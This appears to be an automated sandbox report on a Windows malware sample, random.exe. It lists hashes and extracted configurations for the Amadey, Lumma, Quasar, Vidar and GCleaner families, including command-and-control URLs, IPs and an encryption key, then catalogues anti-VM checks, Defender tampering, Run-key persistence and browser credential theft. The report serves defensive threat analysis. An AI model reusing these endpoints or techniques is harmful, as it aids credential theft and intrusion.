Analysis
-
max time kernel
84s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
03/04/2025, 07:24
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win10v2004-20250314-en
General
-
Target
random.exe
-
Size
1.8MB
-
MD5
86428a8e81fd73f31a5730758e8d90a6
-
SHA1
499eab8ce96089bd54ef95693096525938b5c286
-
SHA256
4facc56a1012801ac81d763f53d57c6c35ed4948945aa925df96cdaa30b1b90f
-
SHA512
be10c0a63d32a64563ab36033da9fac85648693e95dcfe4d72ae2e339a6a257ac731ac545fbbd80091b15a4830ca36d32b53a8fc46239c228ec17e84df44b156
-
SSDEEP
49152:uHyrY8pYiaext5gwu4niwDC+KWrsrj0prynVia3:udiaa5Nniwe+DrKgkB
Malware Config
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
lumma
https://ironloxp.live/aksdd
https://metalsyo.digital/opsa
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://gspacedbv.world/EKdlsk
https://1galxnetb.today/GsuIAo
https://3starcloc.bet/GOksAo
https://spacedbv.world/EKdlsk
https://galxnetb.today/GsuIAo
https://cosmosyf.top/GOsznj
https://hcosmosyf.top/GOsznj
https://hywnnavstarx.shop/FoaJSi
https://1targett.top/dsANGt
https://srlxspoty.run/nogoaz
https://jrxsafer.top/shpaoz
https://1krxspint.digital/kendwz
https://.w0rhxhube.run/pogrs
https://grxeasyw.digital/xxepw
https://xrfxcaseq.live/gspaz
https://8ywmedici.top/noagis
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
-
encryption_key
BF72099FDBC6B48816529089CF1CF2CF86357D14
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Modded Client Startup
-
subdirectory
SubDir
Extracted
vidar
13.3
928af183c2a2807a3c0526e8c0c9369d
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Extracted
gcleaner
185.156.73.98
45.91.200.135
Signatures
-
Amadey family
-
Asyncrat family
-
Detect Vidar Stealer 29 IoCs
resource yara_rule behavioral1/memory/1448-249-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-248-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-264-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-265-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-270-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-280-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-283-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-300-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-302-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-311-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-315-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-320-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-694-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-712-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-713-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-750-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-775-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-779-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-780-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-785-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-787-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-789-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-889-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-901-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-904-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-990-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-1055-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-1268-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral1/memory/1448-1271-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/19116-1741-0x0000000000A20000-0x0000000000E6C000-memory.dmp healer behavioral1/memory/19116-1742-0x0000000000A20000-0x0000000000E6C000-memory.dmp healer behavioral1/memory/19116-1806-0x0000000000A20000-0x0000000000E6C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Lumma family
-
Modifies security service 2 TTPs 2 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security reg.exe -
Quasar family
-
Quasar payload 2 IoCs
resource yara_rule behavioral1/memory/5924-131-0x000000000C4C0000-0x000000000C614000-memory.dmp family_quasar behavioral1/memory/5924-132-0x0000000004C90000-0x0000000004CAA000-memory.dmp family_quasar -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 1 IoCs
resource yara_rule behavioral1/memory/6068-152-0x0000000000400000-0x000000000073A000-memory.dmp family_stormkitty -
Stormkitty family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ffa1739846.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 959b19dde6.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ f0c35b61ae.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ random.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 060787c2b1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 93de04080d.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 51 5924 powershell.exe 142 5924 powershell.exe 258 5924 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 5924 powershell.exe 1512 powershell.exe 1068 powershell.exe 4104 powershell.exe 8092 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 15 IoCs
flow pid Process 113 3536 futors.exe 113 3536 futors.exe 249 3416 rapes.exe 249 3416 rapes.exe 255 1448 MSBuild.exe 255 1448 MSBuild.exe 120 3416 rapes.exe 120 3416 rapes.exe 80 3416 rapes.exe 81 3536 futors.exe 143 3536 futors.exe 28 3416 rapes.exe 49 3416 rapes.exe 64 3416 rapes.exe 215 3536 futors.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 5680 takeown.exe 836 icacls.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 2024 chrome.exe 5508 chrome.exe 2732 chrome.exe 1508 chrome.exe 3372 msedge.exe 4540 msedge.exe 1508 msedge.exe 3700 msedge.exe 5504 msedge.exe 1824 chrome.exe -
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 93de04080d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion f0c35b61ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion f0c35b61ae.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 073096bce1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 060787c2b1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 060787c2b1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 93de04080d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ffa1739846.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ffa1739846.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 073096bce1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 959b19dde6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 959b19dde6.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion random.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation random.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation apple.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation 261.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation a29574c265.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_914fdbcb.cmd powershell.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_914fdbcb.cmd powershell.exe -
Executes dropped EXE 35 IoCs
pid Process 3416 rapes.exe 4632 dojG16n.exe 2164 PJ7KEk9.exe 1036 4WMUMmx.exe 5844 apple.exe 6128 261.exe 2844 261.exe 3692 amnew.exe 3536 futors.exe 1904 060787c2b1.exe 5716 rapes.exe 5624 futors.exe 956 v7942.exe 5744 svchost015.exe 4696 alex12312321.exe 4556 93de04080d.exe 3584 svchost015.exe 4572 dc9813e710.exe 3196 bot.exe 4976 bot.exe 4268 legendarik.exe 720 8b2e4e6c8c.exe 3040 a29574c265.exe 736 22c3dbcd99.exe 3904 crypted.exe 2368 Constraints.com 5380 ffa1739846.exe 920 959b19dde6.exe 3104 lxt00zm7y5.exe 1372 f0c35b61ae.exe 2228 svchost015.exe 5172 073096bce1.exe 2100 0rqi589z58.exe 5552 h915aBq0E5.exe 3664 CjwdalZkEQ.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 93de04080d.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine ffa1739846.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 959b19dde6.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine f0c35b61ae.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine random.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine 060787c2b1.exe Key opened \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Software\Wine rapes.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 836 icacls.exe 5680 takeown.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ffa1739846.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10428280101\\ffa1739846.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\959b19dde6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10049540101\\959b19dde6.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\f0c35b61ae.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10049550101\\f0c35b61ae.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\073096bce1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10428290101\\073096bce1.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x00090000000243f4-1666.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 4576 tasklist.exe 1784 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4616 random.exe 3416 rapes.exe 5716 rapes.exe 1904 060787c2b1.exe 4556 93de04080d.exe 5380 ffa1739846.exe 920 959b19dde6.exe 1372 f0c35b61ae.exe -
Suspicious use of SetThreadContext 13 IoCs
description pid Process procid_target PID 4632 set thread context of 956 4632 dojG16n.exe 98 PID 2164 set thread context of 1536 2164 PJ7KEk9.exe 103 PID 1036 set thread context of 6068 1036 4WMUMmx.exe 112 PID 956 set thread context of 1448 956 v7942.exe 199 PID 1904 set thread context of 5744 1904 060787c2b1.exe 200 PID 4696 set thread context of 4436 4696 alex12312321.exe 202 PID 4556 set thread context of 3584 4556 93de04080d.exe 221 PID 4572 set thread context of 4568 4572 dc9813e710.exe 223 PID 4268 set thread context of 1860 4268 legendarik.exe 240 PID 3904 set thread context of 1204 3904 crypted.exe 257 PID 3104 set thread context of 4484 3104 lxt00zm7y5.exe 267 PID 920 set thread context of 2228 920 959b19dde6.exe 269 PID 2100 set thread context of 5920 2100 0rqi589z58.exe 272 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\shellext.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe -
Drops file in Windows directory 15 IoCs
description ioc Process File opened for modification C:\Windows\LimeNirvana a29574c265.exe File opened for modification C:\Windows\AndorraPrint a29574c265.exe File created C:\Windows\Tasks\futors.job amnew.exe File opened for modification C:\Windows\MadnessSet a29574c265.exe File opened for modification C:\Windows\DependMedication a29574c265.exe File opened for modification C:\Windows\CongressJvc a29574c265.exe File opened for modification C:\Windows\DealersFocuses a29574c265.exe File opened for modification C:\Windows\PolarRail a29574c265.exe File opened for modification C:\Windows\AucklandChef a29574c265.exe File opened for modification C:\Windows\NewcastlePeripherals a29574c265.exe File opened for modification C:\Windows\LocksWisconsin a29574c265.exe File created C:\Windows\Tasks\rapes.job random.exe File opened for modification C:\Windows\ZuMiller a29574c265.exe File opened for modification C:\Windows\SyntheticLil a29574c265.exe File opened for modification C:\Windows\ExceedExec a29574c265.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2520 sc.exe 6100 sc.exe 2088 sc.exe 2848 sc.exe 5756 sc.exe 1536 sc.exe 3664 sc.exe 2388 sc.exe 1320 sc.exe 4044 sc.exe 604 sc.exe 5624 sc.exe 5944 sc.exe 720 sc.exe 4980 sc.exe 4960 sc.exe 1860 sc.exe 3460 sc.exe 5672 sc.exe 5132 sc.exe 5824 sc.exe 2120 sc.exe 6064 sc.exe 5180 sc.exe 3476 sc.exe 3456 sc.exe 2484 sc.exe 4664 sc.exe 5056 sc.exe 1592 sc.exe 4832 sc.exe 2912 sc.exe 3020 sc.exe 4628 sc.exe 2348 sc.exe 4364 sc.exe 3528 sc.exe 4336 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 7 IoCs
pid pid_target Process procid_target 4204 6068 WerFault.exe 112 15732 4692 WerFault.exe 276 18988 1460 WerFault.exe 277 23944 15804 WerFault.exe 284 6996 17644 WerFault.exe 306 9032 14460 WerFault.exe 345 21020 10892 WerFault.exe 356 -
System Location Discovery: System Language Discovery 1 TTPs 42 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 060787c2b1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 93de04080d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8b2e4e6c8c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a29574c265.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Constraints.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 959b19dde6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 261.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f0c35b61ae.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ffa1739846.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 MSBuild.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4128 timeout.exe 15624 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
